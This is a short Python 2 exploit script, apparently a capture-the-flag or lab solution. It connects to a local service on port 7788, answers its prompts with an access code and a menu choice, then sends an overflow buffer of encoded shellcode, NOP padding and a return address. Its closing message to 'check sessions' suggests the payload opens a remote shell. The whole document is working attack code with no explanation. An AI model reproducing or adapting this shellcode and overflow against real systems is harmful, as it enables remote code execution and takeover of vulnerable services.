import socket imf = socket.socket(socket.AF_INET, socket.SOCK_STREAM) imf.connect(("localhost", 7788)) imf.recv(1024) imf.send("48093572\n") imf.recv(1024) imf.send("3\n") imf.recv(1024) buf = "" buf += "\xdb\xc1\xbf\x45\x74\x9d\x26\xd9\x74\x24\xf4\x5d\x31" buf += "\xc9\xb1\x12\x83\xed\xfc\x31\x7d\x16\x03\x7d\x16\xe2" buf += "\xb0\x45\x46\xd1\xd9\xf5\x3b\x4d\x77\xf8\x0b\x17\x0e" buf += "\x1d\xa6\x58\x87\x85\x51\x99\x0f\x12\x0e\x71\x4d\x65" buf += "\x4a\x50\xd8\x84\x38\x32\x82\x16\xec\xed\xbb\x76\x4d" buf += "\xdf\x3b\xca\x55\x66\x3b\x3b\x5a\x98\xb2\xd8\x9b\x73" buf += "\xc8\xdf\xff\x88\x60\xa2\x32\x10\xdb\xd4\x2c\x88\x6d" buf += "\xea\x1e\xa8\x5c\x73\xa1\x4e" buf+= "\x90"*(168-len(buf))+"\x63\x85\x04\x08\n" #send exploit imf.send(buf) print "Payload Sent |+| Check Sessions."